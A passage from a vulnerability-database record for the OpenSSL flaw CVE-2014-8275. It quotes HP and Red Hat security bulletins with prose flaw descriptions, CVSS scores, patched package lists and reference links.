(AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6\nCVE-2015-1788 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-1790 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-1792 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-2139 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-2140 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-3113 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5122 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5123 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2015-5402 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9\nCVE-2015-5403 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\nCVE-2015-5404 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5405 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\nCVE-2015-5427 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5428 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5429 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5430 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2015-5431 (AV:N/AC:M/Au:S/C:P/I:P/A:N) 4.9\nCVE-2015-5432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2015-5433 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 3.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the\nvulnerabilities in the impacted versions of HP Matrix Operating Environment\n\nHP Matrix Operating Environment 7.5.0 is only available on DVD. Please order\nthe latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO\nfrom the following location:\n\nhttp://www.hp.com/go/insightupdates\n\nChoose the orange Select button. This presents the HP Insight Management\nMedia order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from\nthe Software specification list. Fill out the rest of the form and submit it. \n\nHP has addressed these vulnerabilities for the affected software components\nbundled with the HP Matrix Operating Environment in the following HP Security\nBulletins. \n\nHP Matrix Operating Environment component\n HP Security Bulletin Number\n Security Bulletin Location\n\nHP Systems Insight Manager (SIM)\n HPSBMU03394\n HPSBMU03394\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04762744\n\nHP System Management Homepage (SMH)\n HPSBMU03380\n http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04746490\u0026la\nng=en-us\u0026cc=\n\nHP Version Control Agent (VCA)\n HPSBMU03397\n https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04765169\n\nHP Version Control Repository Manager (VCRM)\n HPSBMU03396\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04765115\n\nHP Virtual Connect Enterprise Manager (VCEM) SDK\n HPSBMU03413\n https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr\n_na-c04774021\n\nHISTORY\nVersion:1 (rev.1) - 24 August 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2015:0066-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html\nIssue date: 2015-01-20\nUpdated on: 2015-01-21\nCVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 \n CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 \n CVE-2015-0206 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nA NULL pointer dereference flaw was found in the DTLS implementation of\nOpenSSL. A remote attacker could send a specially crafted DTLS message,\nwhich would cause an OpenSSL server to crash. (CVE-2014-3571)\n\nA memory leak flaw was found in the way the dtls1_buffer_record() function\nof OpenSSL parsed certain DTLS messages. A remote attacker could send\nmultiple specially crafted DTLS messages to exhaust all available memory of\na DTLS server. (CVE-2015-0206)\n\nIt was found that OpenSSL\u0027s BigNumber Squaring implementation could produce\nincorrect results under certain special conditions. This flaw could\npossibly affect certain OpenSSL library functionality, such as RSA\nblinding. Note that this issue occurred rarely and with a low probability,\nand there is currently no known way of exploiting it. (CVE-2014-3570)\n\nIt was discovered that OpenSSL would perform an ECDH key exchange with a\nnon-ephemeral key even when the ephemeral ECDH cipher suite was selected. \nA malicious server could make a TLS/SSL client using OpenSSL use a weaker\nkey exchange method than the one requested by the user. (CVE-2014-3572)\n\nIt was discovered that OpenSSL would accept ephemeral RSA keys when using\nnon-export RSA cipher suites. A malicious server could make a TLS/SSL\nclient using OpenSSL use a weaker key exchange method. (CVE-2015-0204)\n\nMultiple flaws were found in the way OpenSSL parsed X.509 certificates. \nAn attacker could use these flaws to modify an X.509 certificate to produce\na certificate with a different fingerprint without invalidating its\nsignature, and possibly bypass fingerprint-based blacklisting in\napplications. (CVE-2014-8275)\n\nIt was found that an OpenSSL server would, under certain conditions, accept\nDiffie-Hellman client certificates without the use of a private key. \nAn attacker could use a user\u0027s client certificate to authenticate as that\nuser, without needing the private key. (CVE-2015-0205)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to mitigate the above issues. For the update to\ntake effect, all services linked to the OpenSSL library (such as httpd and\nother SSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at \nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites\n1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix\n1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues\n1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record\n1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record\n1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification\n1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\n\nppc64:\nopenssl-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-static-1.0.1e-30.el6_6.5.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-static-1.0.1e-34.el7_0.7.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-static-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-static-1.0.1e-34.el7_0.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3570\nhttps://access.redhat.com/security/cve/CVE-2014-3571\nhttps://access.redhat.com/security/cve/CVE-2014-3572\nhttps://access.redhat.com/security/cve/CVE-2014-8275\nhttps://access.redhat.com/security/cve/CVE-2015-0204\nhttps://access.redhat.com/security/cve/CVE-2015-0205\nhttps://access.redhat.com/security/cve/CVE-2015-0206\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://www.openssl.org/news/secadv_20150108.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X\nENFobdxQdJ+gVAiRe8Qf54A=\n=wyAg\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. These vulnerabilities could be exploited remotely to create a remote\nDenial of Service (DoS) and other vulnerabilites. \n\nReferences:\n\nCVE-2014-8275 Cryptographic Issues (CWE-310)\nCVE-2014-3569 Remote Denial of Service (DoS)\nCVE-2014-3570 Cryptographic Issues (CWE-310)\nCVE-2014-3571 Remote Denial of Service (DoS)\nCVE-2014-3572 Cryptographic Issues (CWE-310)\nCVE-2015-0204 Cryptographic Issues (CWE-310)\nSSRT101885\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The\nupdates are available from either of the following sites:\n\nftp://sl098ze:Secure12@h2.usa.hp.com\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=OPENSSL11I\n\nHP-UX Release\n HP-UX OpenSSL depot name\n\nB.11.11 (11i v1)\n OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot\n\nB.11.23 (11i v2)\n OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (11i v3)\n OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08ze or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant", "sources": [ { "db": "NVD", "id": "CVE-2014-8275" }, { "db": "JVNDB", "id": "JVNDB-2014-007554" }, { "db": "BID", "id": "71935" }, { "db": "VULMON", "id": "CVE-2014-8275" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "131387" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "PACKETSTORM", "id": "130545" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-8275", "trust": 3.1 }, { "db": "JUNIPER", "id": "JSA10679", "trust": 1.4 }, { "db": "BID", "id": "71935", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10102", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10108", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033378", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU98974537", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU91828320", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-007554", "trust": 0.8 }, { "db": "VULMON", "id": "CVE-2014-8275", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133317", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130987", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131387", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131408", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133325", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132763", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130051", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130545", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-8275" }, { "db": "BID", "id": "71935" }, { "db": "JVNDB", "id": "JVNDB-2014-007554" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "131387" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "PACKETSTORM", "id": "130545" }, { "db": "NVD", "id": "CVE-2014-8275" } ] }, "id": "VAR-201501-0442", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.36198661599999993 }, "last_update_date": "2024-07-23T19:45:42.984000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/apr/msg00001.html" }, { "title": "HT204659", "trust": 0.8, "url": "https://support.apple.com/en-us/ht204659" }, { "title": "HT204659", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht204659" }, { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "title": "use correct function name", "trust": 0.8, "url": "https://github.com/openssl/openssl/commit/cb62ab4b17818fe66d2fed0a7fe71969131c811b" }, { "title": "Fix various certificate fingerprint issues.", 